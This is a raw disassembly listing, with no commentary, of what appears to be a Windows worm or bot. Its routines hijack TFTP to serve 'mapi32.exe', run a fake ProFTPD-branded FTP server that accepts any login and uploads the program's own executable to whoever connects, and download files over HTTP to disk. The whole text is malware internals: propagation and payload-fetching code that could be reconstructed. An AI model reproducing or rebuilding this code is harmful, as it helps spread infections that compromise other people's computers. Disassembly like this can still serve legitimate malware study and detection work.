call sub_40AC2E
push 5
lea eax, [ebp+var_1464]
push offset dword_403150
push eax
call sub_40AC2E
push 24h
lea eax, [ebp+var_4940]
push offset aA ; ""
push eax
call sub_40AC2E
push esi
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_491C]
push eax
call sub_40AC2E
push 4
lea eax, [ebp+var_471C]
push offset dword_403148
push eax
call sub_40AC2E
add esp, 48h
lea eax, [ebp+var_2618]
push ebx
push eax
lea eax, [ebp+var_4718]
push eax
call sub_40AC2E
push 4
lea eax, [ebp+var_2718]
push offset dword_403140
push eax
call sub_40AC2E
add esp, 18h
lea eax, [ebp+var_4940]
push 0
push 222Ch
push eax
push [ebp+arg_0]
call dword_401244
cmp eax, 0FFFFFFFFh
jnz short loc_407BB8
push 0
call dword_4010EC ; ExitThread
loc_407BB8: ; CODE XREF: sub_40785E+350�j
push [ebp+arg_0]
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
sub_40785E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BC9 proc near ; DATA XREF: sub_40933F+132�o
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_340 = byte ptr -340h
var_33F = byte ptr -33Fh
var_33E = byte ptr -33Eh
var_33D = byte ptr -33Dh
var_23C = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_23A = byte ptr -23Ah
var_239 = byte ptr -239h
var_238 = byte ptr -238h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 444h
push ebx
push esi
xor ebx, ebx
push edi
push ebx
push 2
push 2
call dword_401234
mov esi, offset aTftpdhijack ; "TFTPDHijack"
mov edi, eax
push esi
mov [ebp+var_4], edi
call sub_40A64F
lea eax, [eax+eax*2]
push 1
push 45h
push edi
mov dword_40B0E0[eax*8], edi
call sub_4085A6
add esp, 10h
test al, al
jnz short loc_407C1C
push esi
call sub_40A64F
push eax
call sub_40A56C
pop ecx
jmp short loc_407C3A
; ---------------------------------------------------------------------------
loc_407C1C: ; CODE XREF: sub_407BC9+42�j
push offset dword_4030FC
push offset aMapi32_exe ; "mapi32.exe"
call sub_40AC52
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_407C44
push edi
call sub_408616
loc_407C3A: ; CODE XREF: sub_407BC9+51�j
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_407C44: ; CODE XREF: sub_407BC9+69�j
mov edi, dword_401258
mov esi, 200h
loc_407C4F: ; CODE XREF: sub_407BC9+D2�j
; sub_407BC9+17E�j ...
mov eax, [ebp+var_4]
push 104h
mov [ebp+var_440], eax
lea eax, [ebp+var_340]
push ebx
push eax
mov [ebp+var_18], 5
mov [ebp+var_14], 1388h
mov [ebp+var_444], 1
call sub_40AC10
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push ebx
lea eax, [ebp+var_444]
push ebx
push eax
push ebx
call dword_4011F0
test eax, eax
jle short loc_407C4F
lea eax, [ebp+var_C]
mov [ebp+var_C], 10h
push eax
lea eax, [ebp+var_28]
push eax
push ebx
lea eax, [ebp+var_340]
push 104h
push eax
push [ebp+var_4]
call dword_4011FC
push [ebp+var_24]
call dword_401220
push eax
lea eax, [ebp+var_38]
push eax
call sub_40AB94
cmp [ebp+var_340], bl
pop ecx
pop ecx
jnz loc_407E19
cmp [ebp+var_33F], 1
jnz short loc_407D4C
push offset aMapi32_exe ; "mapi32.exe"
call sub_40ABD2
push ebx
push ebx
push [ebp+var_8]
call sub_40AC58
push [ebp+var_8]
lea eax, [ebp+var_238]
mov [ebp+var_23C], bl
mov [ebp+var_23B], 3
push esi
push 1
push eax
mov [ebp+var_23A], bl
mov [ebp+var_239], 1
call sub_40AC4C
add esp, 20h
lea ecx, [ebp+var_28]
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_23C]
push eax
loc_407D42: ; CODE XREF: sub_407BC9+25F�j
push [ebp+var_4]
call edi ; dword_401258
jmp loc_407C4F
; ---------------------------------------------------------------------------
loc_407D4C: ; CODE XREF: sub_407BC9+121�j
cmp [ebp+var_33F], 4
jnz loc_407E19
mov cl, [ebp+var_33D]
mov al, [ebp+var_33E]
cmp cl, 0FFh
mov [ebp+var_23C], bl
mov [ebp+var_23B], 3
jnz short loc_407D89
inc al
xor cl, cl
mov [ebp+var_23A], al
mov [ebp+var_239], bl
jmp short loc_407D97
; ---------------------------------------------------------------------------
loc_407D89: ; CODE XREF: sub_407BC9+1AC�j
inc cl
mov [ebp+var_23A], al
mov [ebp+var_239], cl
loc_407D97: ; CODE XREF: sub_407BC9+1BE�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_40AC58
push [ebp+var_8]
lea eax, [ebp+var_238]
push esi
push 1
push eax
call sub_40AC4C
add esp, 1Ch
lea ecx, [ebp+var_28]
mov [ebp+var_10], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_23C]
push eax
push [ebp+var_4]
call edi ; dword_401258
cmp [ebp+var_10], ebx
jnz loc_407C4F
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_38]
push eax
call sub_409570
pop ecx
push eax
mov eax, dword_40372C
imul eax, 1Ch
push off_401BB0[eax]
push offset dword_40317C
call sub_405185
add esp, 10h
jmp loc_407C4F
; ---------------------------------------------------------------------------
loc_407E19: ; CODE XREF: sub_407BC9+114�j
; sub_407BC9+18A�j
push [ebp+var_C]
lea eax, [ebp+var_28]
push eax
push ebx
push 9
push offset dword_403170
jmp loc_407D42
sub_407BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E2D proc near ; CODE XREF: sub_407F46+4FD�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 1
push 2
call dword_401234
push [ebp+arg_0]
mov dword_40B098, eax
mov [ebp+var_10], 2
call dword_40124C
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_401230
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_40B098
call dword_401238
cmp eax, 0FFFFFFFFh
setnz al
leave
retn
sub_407E2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E7D proc near ; CODE XREF: sub_407F46+508�p
var_520 = dword ptr -520h
var_51C = byte ptr -51Ch
var_418 = byte ptr -418h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404448
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 510h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_4], ebx
push 104h
lea eax, [ebp+var_51C]
push eax
push ebx
call dword_4010D0 ; GetModuleFileNameA
push offset dword_4030FC
lea eax, [ebp+var_51C]
push eax
call sub_40AC52
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_520], edi
cmp edi, ebx
jnz short loc_407EE5
or [ebp+var_4], 0FFFFFFFFh
xor al, al
jmp short loc_407F37
; ---------------------------------------------------------------------------
loc_407EE5: ; CODE XREF: sub_407E7D+5E�j
mov esi, 400h
loc_407EEA: ; CODE XREF: sub_407E7D+A3�j
test byte ptr [edi+0Ch], 10h
push edi
jnz short loc_407F22
push 1
push esi
lea eax, [ebp+var_418]
push eax
call sub_40AC4C
add esp, 10h
push ebx
push esi
lea eax, [ebp+var_418]
push eax
push dword_40B098
call dword_401244
push 1
call dword_4010F4 ; Sleep
jmp short loc_407EEA
; ---------------------------------------------------------------------------
loc_407F22: ; CODE XREF: sub_407E7D+72�j
call sub_40AC46
pop ecx
jmp short loc_407F31
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_407F31: ; CODE XREF: sub_407E7D+AB�j
or [ebp+var_4], 0FFFFFFFFh
mov al, 1
loc_407F37: ; CODE XREF: sub_407E7D+66�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_407E7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F46 proc near ; DATA XREF: sub_40933F+19E�o
var_514 = dword ptr -514h
var_410 = byte ptr -410h
var_390 = byte ptr -390h
var_350 = byte ptr -350h
var_310 = byte ptr -310h
var_290 = byte ptr -290h
var_210 = byte ptr -210h
var_1D0 = byte ptr -1D0h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_BC = byte ptr -0BCh
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 514h
push ebx
push esi
push edi
xor edi, edi
push edi
push 1
push 2
mov [ebp+var_1C0], edi
mov [ebp+var_514], edi
call dword_401234
mov esi, offset aFtpd ; "Ftpd"
mov ebx, eax
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push edi
mov dword_40B0E0[eax*8], ebx
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
push eax
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push dword_40B0E0[eax*8]
call sub_4085A6
add esp, 0Ch
test al, al
push esi
jnz short loc_407FBD
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push edi
call dword_4010EC ; ExitThread
loc_407FBD: ; CODE XREF: sub_407F46+61�j
call sub_40A64F
lea eax, [eax+eax*2]
push esi
mov [ebp+var_1C0], 1
mov eax, dword_40B0E0[eax*8]
mov [ebp+var_1BC], eax
call sub_40A64F
lea eax, [eax+eax*2]
push esi
mov eax, dword_40B0E0[eax*8]
mov [ebp+arg_0], eax
call sub_40A64F
lea eax, [eax+eax*2]
add esp, 0Ch
cmp dword_40B0E0[eax*8], edi
jz loc_40852D
mov ebx, dword_401244
loc_40800E: ; CODE XREF: sub_407F46+5DC�j
push 41h
lea esi, [ebp+var_1C0]
pop ecx
lea edi, [ebp+var_514]
rep movsd
xor esi, esi
lea eax, [ebp+var_514]
push esi
push esi
push esi
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call dword_4011F0
cmp eax, 0FFFFFFFFh
jz loc_408543
xor edi, edi
cmp [ebp+arg_0], esi
jl loc_40850D
loc_40804A: ; CODE XREF: sub_407F46+5C1�j
push 80h
lea eax, [ebp+var_290]
push esi
push eax
call sub_40AC10
push 80h
lea eax, [ebp+var_BC]
push esi
push eax
call sub_40AC10
add esp, 18h
lea eax, [ebp+var_514]
push eax
push edi
call sub_40AE66
test eax, eax
jz loc_408503
push offset aFtpd ; "Ftpd"
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
cmp edi, dword_40B0E0[eax*8]
jnz loc_40816A
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_1D0]
push eax
push offset aFtpd ; "Ftpd"
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push dword_40B0E0[eax*8]
call dword_4011F8
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_408503
xor ecx, ecx
cmp [ebp+var_1C0], esi
jbe short loc_4080FA
lea edx, [ebp+var_1BC]
loc_4080EA: ; CODE XREF: sub_407F46+1B2�j
cmp [edx], eax
jz short loc_4080FA
inc ecx
add edx, 4
cmp ecx, [ebp+var_1C0]
jb short loc_4080EA
loc_4080FA: ; CODE XREF: sub_407F46+19C�j
; sub_407F46+1A6�j
cmp ecx, [ebp+var_1C0]
jnz short loc_408118
cmp [ebp+var_1C0], 40h
jnb short loc_408118
mov [ebp+ecx*4+var_1BC], eax
inc [ebp+var_1C0]
loc_408118: ; CODE XREF: sub_407F46+1BA�j
; sub_407F46+1C3�j
cmp eax, [ebp+arg_0]
jle short loc_408120
mov [ebp+arg_0], eax
loc_408120: ; CODE XREF: sub_407F46+1D5�j
push 0Ah
push esi
call sub_40A818
pop ecx
pop ecx
push eax
push 2
push esi
call sub_40A818
pop ecx
pop ecx
push eax
lea eax, [ebp+var_410]
push offset a220Proftpd1_D_ ; "220 ProFTPD 1.%d.%d Server (ProFTPD Def"...
push eax
call sub_40AB94
add esp, 10h
lea eax, [ebp+var_410]
push esi
push eax
call sub_40ABD2
pop ecx
push eax
lea eax, [ebp+var_410]
push eax
push [ebp+var_8]
call ebx ; dword_401244
jmp loc_408503
; ---------------------------------------------------------------------------
loc_40816A: ; CODE XREF: sub_407F46+155�j
push esi
lea eax, [ebp+var_290]
push 80h
push eax
push edi
call dword_40123C
test eax, eax
jg short loc_4081D4
mov edx, [ebp+var_1C0]
xor ecx, ecx
cmp edx, esi
jbe short loc_4081C8
lea eax, [ebp+var_1BC]
loc_408194: ; CODE XREF: sub_407F46+258�j
cmp [eax], edi
jz short loc_4081A2
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_408194
jmp short loc_4081C8
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_407F46+250�j
dec edx
cmp ecx, edx
jnb short loc_4081C2
lea eax, [ebp+ecx*4+var_1BC]
loc_4081AE: ; CODE XREF: sub_407F46+27A�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_1C0]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_4081AE
loc_4081C2: ; CODE XREF: sub_407F46+25F�j
dec [ebp+var_1C0]
loc_4081C8: ; CODE XREF: sub_407F46+246�j
; sub_407F46+25A�j
push edi
call dword_401240
jmp loc_408503
; ---------------------------------------------------------------------------
loc_4081D4: ; CODE XREF: sub_407F46+23A�j
lea eax, [ebp+var_310]
push eax
lea eax, [ebp+var_BC]
push eax
lea eax, [ebp+var_290]
push offset aSS ; "%s %s"
push eax
call sub_40AC64
lea eax, [ebp+var_BC]
push offset aUser ; "USER"
push eax
call sub_40ABB2
add esp, 18h
test eax, eax
jnz short loc_408218
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_408218: ; CODE XREF: sub_407F46+2C3�j
lea eax, [ebp+var_BC]
push offset aPass ; "PASS"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_40823C
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_40823C: ; CODE XREF: sub_407F46+2E7�j
lea eax, [ebp+var_BC]
push offset aSyst ; "SYST"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_408260
push esi
push 12h
push offset a215UnixTypeL8 ; "215 UNIX Type: L8\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_408260: ; CODE XREF: sub_407F46+30B�j
lea eax, [ebp+var_BC]
push offset aRest ; "REST"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_408284
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_408284: ; CODE XREF: sub_407F46+32F�j
lea eax, [ebp+var_BC]
push offset aPwd ; "PWD"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_4082A8
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_4082A8: ; CODE XREF: sub_407F46+353�j
lea eax, [ebp+var_BC]
push offset aType ; "TYPE"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_4082D6
lea eax, [ebp+var_310]
push offset aA_0 ; "A"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jz short loc_4082ED
loc_4082D6: ; CODE XREF: sub_407F46+377�j
lea eax, [ebp+var_310]
push offset aI ; "I"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_4082FA
loc_4082ED: ; CODE XREF: sub_407F46+38E�j
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_4082FA: ; CODE XREF: sub_407F46+3A5�j
lea eax, [ebp+var_BC]
push offset aPasv ; "PASV"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_40831E
push esi
push 29h
push offset a425PassiveNotS ; "425 Passive not supported on this serve"...
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_40831E: ; CODE XREF: sub_407F46+3C9�j
lea eax, [ebp+var_BC]
push offset aList ; "LIST"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_408342
push esi
push 16h
push offset a226TransferCom ; "226 Transfer complete\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_408342: ; CODE XREF: sub_407F46+3ED�j
lea eax, [ebp+var_BC]
push offset aPort ; "PORT"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz loc_408416
lea eax, [ebp+var_390]
push eax
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_290]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_40AC64
lea eax, [ebp+var_350]
push eax
call sub_40ABAC
mov [ebp+var_4], eax
lea eax, [ebp+var_390]
push eax
call sub_40ABAC
mov [ebp+var_8], eax
push 40h
lea eax, [ebp+var_210]
push esi
push eax
call sub_40AC10
add esp, 34h
lea eax, [ebp+var_210]
push [ebp+var_8]
push [ebp+var_4]
push offset aXX ; "%x%x\n"
push eax
call sub_40AB94
push 10h
lea eax, [ebp+var_210]
push esi
push eax
call sub_40AC5E
add esp, 1Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_40AB94
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_4084EB
; ---------------------------------------------------------------------------
loc_408416: ; CODE XREF: sub_407F46+411�j
lea eax, [ebp+var_BC]
push offset aRetr ; "RETR"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz loc_4084CC
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; dword_401244
push [ebp+var_4]
lea eax, [ebp+var_3C]
push eax
call sub_407E2D
pop ecx
test al, al
pop ecx
jz short loc_4084C2
call sub_407E7D
test al, al
push esi
jz short loc_408461
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
jmp short loc_408468
; ---------------------------------------------------------------------------
loc_408461: ; CODE XREF: sub_407F46+510�j
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
loc_408468: ; CODE XREF: sub_407F46+519�j
push edi
call ebx ; dword_401244
inc dword_40B270
lea eax, [ebp+var_2C]
push eax
push edi
call sub_40854A
pop ecx
lea eax, [ebp+var_2C]
pop ecx
push eax
lea eax, [ebp+var_2C]
push eax
call sub_409570
pop ecx
push eax
lea eax, [ebp+var_310]
push eax
mov eax, dword_40372C
imul eax, 1Ch
push dword_40B270
push off_401BB0[eax]
push offset dword_4031F0
call sub_405185
add esp, 18h
push dword_40B098
call dword_401240
jmp short loc_4084EE
; ---------------------------------------------------------------------------
loc_4084C2: ; CODE XREF: sub_407F46+506�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_4084EB
; ---------------------------------------------------------------------------
loc_4084CC: ; CODE XREF: sub_407F46+4E5�j
lea eax, [ebp+var_BC]
push offset aQuit ; "QUIT"
push eax
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jnz short loc_4084EE
push esi
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_4084EB: ; CODE XREF: sub_407F46+2CD�j
; sub_407F46+2F1�j ...
push edi
call ebx ; dword_401244
loc_4084EE: ; CODE XREF: sub_407F46+57A�j
; sub_407F46+59B�j
push 80h
lea eax, [ebp+var_290]
push esi
push eax
call sub_40AC10
add esp, 0Ch
loc_408503: ; CODE XREF: sub_407F46+13A�j
; sub_407F46+18E�j ...
inc edi
cmp edi, [ebp+arg_0]
jle loc_40804A
loc_40850D: ; CODE XREF: sub_407F46+FE�j
push offset aFtpd ; "Ftpd"
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
cmp dword_40B0E0[eax*8], esi
jnz loc_40800E
mov esi, offset aFtpd ; "Ftpd"
loc_40852D: ; CODE XREF: sub_407F46+BC�j
push esi
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push 1
call dword_4010EC ; ExitThread
loc_408543: ; CODE XREF: sub_407F46+F3�j
push esi
call dword_4010EC ; ExitThread
sub_407F46 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40854A proc near ; CODE XREF: sub_407708+61�p
; sub_407F46+530�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_40120C
test eax, eax
jz short loc_408570
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_408570: ; CODE XREF: sub_40854A+20�j
push 2
lea eax, [ebp+var_10]
push 4
push eax
call dword_401208
test eax, eax
jnz short loc_408596
push [ebp+var_10]
call dword_401220
push eax
push [ebp+arg_4]
call sub_40AB94
jmp short loc_4085A0
; ---------------------------------------------------------------------------
loc_408596: ; CODE XREF: sub_40854A+36�j
push dword ptr [eax]
push [ebp+arg_4]
call sub_40ABA0
loc_4085A0: ; CODE XREF: sub_40854A+4A�j
pop ecx
mov al, 1
pop ecx
leave
retn
sub_40854A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085A6 proc near ; CODE XREF: sub_40785E+48�p
; sub_407BC9+38�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
mov [ebp+var_10], 2
call dword_401230
mov [ebp+var_E], ax
and [ebp+var_C], 0
lea eax, [ebp+arg_4]
push 4
push eax
push 4
push 0FFFFh
mov [ebp+arg_4], 1
push [ebp+arg_0]
call dword_401218
test eax, eax
jnz short loc_40860E
lea eax, [ebp+var_10]
push 10h
push eax
push [ebp+arg_0]
call dword_401214
cmp eax, 0FFFFFFFFh
jz short loc_40860E
cmp [ebp+arg_8], 0
jnz short loc_408612
push 0Ah
push [ebp+arg_0]
call dword_401210
cmp eax, 0FFFFFFFFh
jnz short loc_408612
loc_40860E: ; CODE XREF: sub_4085A6+3C�j
; sub_4085A6+50�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_408612: ; CODE XREF: sub_4085A6+56�j
; sub_4085A6+66�j
mov al, 1
leave
retn
sub_4085A6 endp
; =============== S U B R O U T I N E =======================================
sub_408616 proc near ; CODE XREF: sub_404530+32C�p
; sub_405185+E3�p ...
arg_0 = dword ptr 4
push 2
push [esp+4+arg_0]
call dword_40121C
push [esp+arg_0]
call dword_401240
retn
sub_408616 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40862D proc near ; CODE XREF: sub_4086A6+22�p
; sub_408825+1C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 7
push offset aHttp ; "http://"
push ebx
call sub_40AC70
add esp, 0Ch
test eax, eax
jnz short loc_408692
lea edi, [ebx+7]
push 2Fh
push edi
call sub_40AC6A
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_408692
push ebx
call sub_40ABD2
cmp eax, 100h
pop ecx
jnb short loc_408692
push esi
push [ebp+arg_8]
call sub_40ABA0
sub esi, ebx
lea eax, [esi-7]
push eax
push edi
mov edi, [ebp+arg_4]
push edi
call sub_40AC2E
add esp, 14h
and byte ptr [esi+edi-7], 0
mov ax, 1
jmp short loc_4086A1
; ---------------------------------------------------------------------------
loc_408692: ; CODE XREF: sub_40862D+1B�j
; sub_40862D+2E�j ...
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
xor ax, ax
loc_4086A1: ; CODE XREF: sub_40862D+63�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40862D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086A6 proc near ; CODE XREF: sub_408825+BD�p
var_604 = byte ptr -604h
var_504 = byte ptr -504h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
sub esp, 604h
push ebx
push esi
lea eax, [ebp+var_104]
push edi
push eax
lea eax, [ebp+var_604]
push eax
xor ebx, ebx
push [ebp+arg_0]
mov [ebp+var_4], ebx
call sub_40862D
add esp, 0Ch
test ax, ax
jz loc_408821
lea eax, [ebp+var_104]
push 2Fh
push eax
call sub_40AC7C
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp+var_104]
push offset aS_1 ; "%s"
push eax
call sub_40AB94
add esp, 0Ch
cmp [ebp+arg_4], ebx
jz loc_408821
push offset aWb ; "wb"
push [ebp+arg_4]
call sub_40AC52
pop ecx
cmp eax, ebx
pop ecx
mov dword_40B09C, eax
jz loc_408821
movzx edi, [ebp+arg_8]
push ebx
lea eax, [ebp+var_504]
push 400h
push eax
push edi
call dword_40123C
mov esi, eax
cmp esi, ebx
jle loc_4087F7
mov ebx, offset asc_403480 ; "\r\n\r\n"
loc_40874B: ; CODE XREF: sub_4086A6+14B�j
cmp [ebp+var_4], 0
jnz short loc_4087B8
push 7
lea eax, [ebp+var_504]
push offset aHttp1_ ; "http/1."
push eax
call sub_40AC70
add esp, 0Ch
test eax, eax
jnz short loc_4087D4
lea eax, [ebp+var_504]
push ebx
push eax
call sub_40AB9A
push 4
mov edi, eax
pop eax
lea ecx, [ebp+var_504]
sub eax, ecx
push ebx
add edi, eax
lea eax, [ebp+var_504]
push eax
call sub_40AB9A
push dword_40B09C
sub esi, edi
add eax, 4
push 1
push esi
push eax
call sub_40AC76
add esp, 20h
test eax, eax
jz short loc_408821
mov [ebp+var_4], 1
jmp short loc_4087D4
; ---------------------------------------------------------------------------
loc_4087B8: ; CODE XREF: sub_4086A6+A9�j
push dword_40B09C
lea eax, [ebp+var_504]
push 1
push esi
push eax
call sub_40AC76
add esp, 10h
test eax, eax
jz short loc_408821
loc_4087D4: ; CODE XREF: sub_4086A6+C3�j
; sub_4086A6+110�j
movzx edi, [ebp+arg_8]
push 0
lea eax, [ebp+var_504]
push 400h
push eax
push edi
call dword_40123C
mov esi, eax
test esi, esi
jg loc_40874B
loc_4087F7: ; CODE XREF: sub_4086A6+9A�j
push 1
push edi
call dword_40121C
push edi
call dword_401240
push dword_40B09C
call sub_40AC46
push [ebp+arg_4]
call sub_40A86F
pop ecx
pop ecx
loc_40881C: ; CODE XREF: sub_4086A6+17D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408821: ; CODE XREF: sub_4086A6+2D�j
; sub_4086A6+5C�j ...
xor eax, eax
jmp short loc_40881C
sub_4086A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408825 proc near ; CODE XREF: sub_404530+3E2�p
var_210 = byte ptr -210h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
lea eax, [ebp+var_210]
push edi
push eax
lea eax, [ebp+var_110]
push eax
push [ebp+arg_0]
call sub_40862D
add esp, 0Ch
test ax, ax
jz loc_408900
push 50h
mov [ebp+var_10], 2
call dword_401230
mov [ebp+var_E], ax
lea eax, [ebp+var_110]
push eax
call sub_409570
pop ecx
push eax
call dword_40124C
push 6
push 1
push 2
mov [ebp+var_C], eax
call dword_401234
mov edi, eax
lea eax, [ebp+var_10]
movzx esi, di
push 10h
push eax
push esi
call dword_401238
test eax, eax
jnz short loc_408900
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_110]
push offset aGetSHttp1_0 ; "GET %s HTTP/1.0\r\n\r\n"
push eax
call sub_40AB94
add esp, 0Ch
lea eax, [ebp+var_110]
push 0
push eax
call sub_40ABD2
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push esi
call dword_401244
cmp eax, 1
